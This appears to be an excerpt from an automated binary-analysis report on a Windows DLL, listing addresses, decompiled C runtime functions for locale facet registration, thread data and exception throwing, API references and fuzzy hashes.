0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5
0x6dddf518
0x6dddf518
0x6dddf51b
0x6dddf51f
0x6dddf523
0x6dddf530
0x6dddf538
0x6dddf53a
0x00000000
0x6dddf53a
0x6dddf501
0x6dddf501
0x00000000
0x6dddf501
0x6dddf4ff
0x6dddf472
0x6dddf472
0x6dddf475
0x6dddf479
0x6dddf47d
0x6dddf48a
0x6dddf492
0x6dddf494
0x00000000
0x6dddf494
0x6dddf45b
0x6dddf45b
0x00000000
0x6dddf45b
0x6dddf459
0x6dddf3cc
0x6dddf3cc
0x6dddf3cf
0x6dddf3d3
0x6dddf3d7
0x6dddf3e4
0x6dddf3ec
0x6dddf3ee
0x00000000
0x6dddf3ee
0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3
0x6dddf326
0x6dddf326
0x6dddf329
0x6dddf32d
0x6dddf331
0x6dddf33e
0x6dddf346
0x6dddf348
0x00000000
0x6dddf348
0x6dddf30f
0x6dddf30f
0x00000000
0x6dddf30f
0x6dddf30d

APIs

__EH_prolog3.LIBCMT ref: 6DDDF2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF2E0
int.LIBCPMT ref: 6DDDF2F7

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF331
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF351
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF36F

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: f4ce9a660ba2285197f123230a476b845669dd42a56b8f52fd18b2c5b897586b
Instruction ID: 2582b827fb31a06d978925739d8e6b20ea7e4e04988f768394c6b344137240d6
Opcode Fuzzy Hash: f4ce9a660ba2285197f123230a476b845669dd42a56b8f52fd18b2c5b897586b
Instruction Fuzzy Hash: 6F11A075809119DBCF05FB64C840BFDB779AF44718F27404AF521AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA24B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DDDA24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t94 =  *0x6de96cd0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6DDB161C(0x6de96cbc);
				_t71 = _a8;
				_t36 = E6DDB171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDAAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t91, _t94, 0x14);
							E6DDD6653( &_v20, 0);
							_t95 =  *0x6de96cd4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6DDB161C(0x6de96cc0);
							_t78 = _a8;
							_t92 = E6DDB171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6DDB1438(_t82);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6de3ba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t92);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6de96cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t91);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6de96cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}

0x6ddda24b
0x6ddda252
0x6ddda25c
0x6ddda261
0x6ddda26c
0x6ddda270
0x6ddda273
0x6ddda278
0x6ddda27c
0x6ddda281
0x6ddda285
0x6ddda2ca
0x6ddda2cd
0x6ddda2d9
0x6ddda287
0x6ddda289
0x6ddda28f
0x6ddda295
0x6ddda29d
0x6ddda2a0
0x6ddda2dd
0x6ddda2eb
0x6ddda2f0
0x6ddda2f8
0x6ddda302
0x6ddda307
0x6ddda312
0x6ddda316
0x6ddda319
0x6ddda31e
0x6ddda327
0x6ddda329
0x6ddda32b
0x6ddda370
0x6ddda373
0x6ddda37f
0x6ddda32d
0x6ddda32d
0x6ddda32f
0x6ddda335
0x6ddda33b
0x6ddda343
0x6ddda346
0x6ddda380
0x6ddda383
0x6ddda391
0x6ddda396
0x6ddda39a
0x6ddda39e
0x6ddda3a3
0x6ddda3a6
0x6ddda3ad
0x6ddda348
0x6ddda348
0x6ddda34b
0x6ddda34f
0x6ddda353
0x6ddda360
0x6ddda368
0x6ddda36a
0x00000000
0x6ddda36a
0x6ddda331
0x6ddda331
0x00000000
0x6ddda331
0x6ddda32f
0x6ddda2a2
0x6ddda2a2
0x6ddda2a5
0x6ddda2a9
0x6ddda2ad
0x6ddda2ba
0x6ddda2c2
0x6ddda2c4
0x00000000
0x6ddda2c4
0x6ddda28b
0x6ddda28b
0x00000000
0x6ddda28b
0x6ddda289

APIs

__EH_prolog3.LIBCMT ref: 6DDDA252
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA25C
int.LIBCPMT ref: 6DDDA273

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDA2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA2EB

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 52081672cba7faffc0913576a312848386c8fe31193362e2430bd09ad3e8b3d3
Instruction ID: 2e8b8a1644f6a7346e004dd939cb3335e4989a52648d1522a664b758dcc9fc4d
Opcode Fuzzy Hash: 52081672cba7faffc0913576a312848386c8fe31193362e2430bd09ad3e8b3d3
Instruction Fuzzy Hash: 5611E071948229DBCF01FBA4C840EFDB7B5AF64318F264409F611AB290DF719902CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD46AB, Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD46AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6DDF00AC(0x6de38144, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6deace84;
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6DDB161C(0x6deacea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6DDB171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6DDD66BA(_t88 - 0x14);
					return E6DDF0075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6DDD4FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t88 - 0x20);
							E6DDF3D74(_t88 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3816f, __ebx, _t83, _t86, 0x18);
							E6DDD6653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6deace7c;
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6DDB161C(0x6deace90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6DDB171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6DDD66BA(_t88 - 0x14);
								return E6DDF0075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6DDD4F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6DDB1438(_t76);
										E6DDF3D74(_t88 - 0x20, 0x6de93504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6DDD6FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6deace7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6DDD6FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6deace84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}

0x6ddd46ab
0x6ddd46b2
0x6ddd46bc
0x6ddd46c1
0x6ddd46ca
0x6ddd46d0
0x6ddd46d3
0x6ddd46d8
0x6ddd46dc
0x6ddd46e1
0x6ddd46e5
0x6ddd4720
0x6ddd4723
0x6ddd472f
0x6ddd46e7
0x6ddd46e9
0x6ddd46ef
0x6ddd46f5
0x6ddd46fd
0x6ddd4700
0x6ddd4733
0x6ddd4741
0x6ddd4746
0x6ddd474e
0x6ddd4758
0x6ddd475d
0x6ddd4766
0x6ddd476c
0x6ddd476f
0x6ddd4774
0x6ddd477d
0x6ddd477f
0x6ddd4781
0x6ddd47bc
0x6ddd47bf
0x6ddd47cb
0x6ddd4783
0x6ddd4783
0x6ddd4785
0x6ddd478b
0x6ddd4791
0x6ddd4799
0x6ddd479c
0x6ddd47cc
0x6ddd47cf
0x6ddd47dd
0x6ddd47e2
0x6ddd47e3
0x6ddd47e7
0x6ddd479e
0x6ddd479e
0x6ddd47a1
0x6ddd47a5
0x6ddd47a9
0x6ddd47b3
0x6ddd47b6
0x00000000
0x6ddd47b6
0x6ddd4787
0x6ddd4787
0x00000000
0x6ddd4787
0x6ddd4785
0x6ddd4702
0x6ddd4702
0x6ddd4705
0x6ddd4709
0x6ddd470d
0x6ddd4717
0x6ddd471a
0x00000000
0x6ddd471a
0x6ddd46eb
0x6ddd46eb
0x00000000
0x6ddd46eb
0x6ddd46e9

APIs

__EH_prolog3.LIBCMT ref: 6DDD46B2
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD46BC
int.LIBCPMT ref: 6DDD46D3

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4723
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD4741

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: be50f6d9b9d4be828d1cf889a4a1661cfd390867a9f1f308ad6c76e5e460fc67
Instruction ID: 60ed59bd32c71875bf7277be5b423a5c9132c9ae16d708880f0145ecee709eea
Opcode Fuzzy Hash: be50f6d9b9d4be828d1cf889a4a1661cfd390867a9f1f308ad6c76e5e460fc67
Instruction Fuzzy Hash: EB11C27590412ADBCF00FBA0C850AFE77B4AF08318F264108F611AB290DF709E0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D5FF, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DE1D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6de951e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6DE1C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6DE24196(_t25, __eflags,  *0x6de951e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6DE1D33F(_t25, _t31, 0x6de976f0);
							E6DE1CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6DE1CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6DE162FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6de951e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6DE1C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6DE24196(_t27, __eflags,  *0x6de951e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6DE1D33F(_t27, _t32, 0x6de976f0);
									E6DE1CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6DE1CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6DE24140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6DE24140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x6de1d5ff
0x6de1d5ff
0x6de1d5ff
0x6de1d609
0x6de1d60b
0x6de1d610
0x6de1d613
0x6de1d621
0x6de1d628
0x6de1d62d
0x6de1d630
0x6de1d633
0x6de1d645
0x6de1d64a
0x6de1d64c
0x6de1d657
0x6de1d65e
0x6de1d663
0x6de1d666
0x6de1d668
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1d64e
0x6de1d64e
0x00000000
0x6de1d64e
0x6de1d635
0x6de1d635
0x6de1d636
0x6de1d636
0x6de1d63b
0x6de1d676
0x6de1d677
0x6de1d67d
0x6de1d682
0x6de1d685
0x6de1d686
0x6de1d687
0x6de1d68e
0x6de1d690
0x6de1d692
0x6de1d697
0x6de1d69a
0x6de1d6a8
0x6de1d6b4
0x6de1d6b7
0x6de1d6ba
0x6de1d6cc
0x6de1d6d1
0x6de1d6d3
0x6de1d6de
0x6de1d6e4
0x6de1d6ec
0x6de1d6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1d6d5
0x6de1d6d5
0x00000000
0x6de1d6d5
0x6de1d6bc
0x6de1d6bc
0x6de1d6bd
0x6de1d6bd
0x6de1d6f0
0x6de1d6f1
0x6de1d6f1
0x6de1d69c
0x6de1d6a2
0x6de1d6a6
0x6de1d6f9
0x6de1d6fa
0x6de1d700
0x00000000
0x00000000
0x00000000
0x6de1d6a6
0x6de1d707
0x6de1d707
0x6de1d615
0x6de1d61b
0x6de1d61f
0x6de1d66a
0x6de1d66b
0x6de1d675
0x00000000
0x00000000
0x00000000
0x6de1d61f

APIs

GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D603
_free.LIBCMT ref: 6DE1D636
_free.LIBCMT ref: 6DE1D65E
SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D66B
SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D677
_abort.LIBCMT ref: 6DE1D67D

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ea25aa7367c2f118cdfb675252f261ec24b92575e45f35cdae13a55d266ba0f8
Instruction ID: a3555f6b7c3bd3943ec992a3db83dc369120bb6295ce60a4f7a9e49f76c3e538
Opcode Fuzzy Hash: ea25aa7367c2f118cdfb675252f261ec24b92575e45f35cdae13a55d266ba0f8
Instruction Fuzzy Hash: 38F0287E78D50166CB1216355C09FBB32769BD367DF73012AF62CE6280EF20C80280A8

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD75E8, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6DDD75E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6DDD73A9( &_v16, _a4);
				E6DDF3D74( &_v16, 0x6de914fc);
				asm("int3");
				_push(_t35);
				E6DDD73E3( &_v44, _v24);
				E6DDF3D74( &_v44, 0x6de91538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6DDD7426( &_v76, _v52);
				E6DDF3D74( &_v76, 0x6de915ac);
				asm("int3");
				_push(_t33);
				E6DDB1420( &_v68, _v48);
				E6DDF3D74( &_v68, 0x6de93450);
				asm("int3");
				return "bad function call";
			}

0x6ddd75eb
0x6ddd75f4
0x6ddd7602
0x6ddd7607
0x6ddd7608
0x6ddd7614
0x6ddd7622
0x6ddd7627
0x6ddd7628
0x6ddd7629
0x6ddd7634
0x6ddd7642
0x6ddd7647
0x6ddd7648
0x6ddd7654
0x6ddd7662
0x6ddd7667
0x6ddd766d

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6DDD75F4

Part of subcall function 6DDD73A9: std::exception::exception.LIBCONCRT ref: 6DDD73B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7602

Part of subcall function 6DDF3D74: RaiseException.KERNEL32(?,?,6DDD75E7,00000000,?,?,?,?,?,?,?,6DDD75E7,00000000,6DE914C0,?), ref: 6DDF3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6DDD7614

Part of subcall function 6DDD73E3: std::exception::exception.LIBCONCRT ref: 6DDD73F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7622
std::regex_error::regex_error.LIBCPMT ref: 6DDD7634

Part of subcall function 6DDD7426: std::exception::exception.LIBCONCRT ref: 6DDD743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7642

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
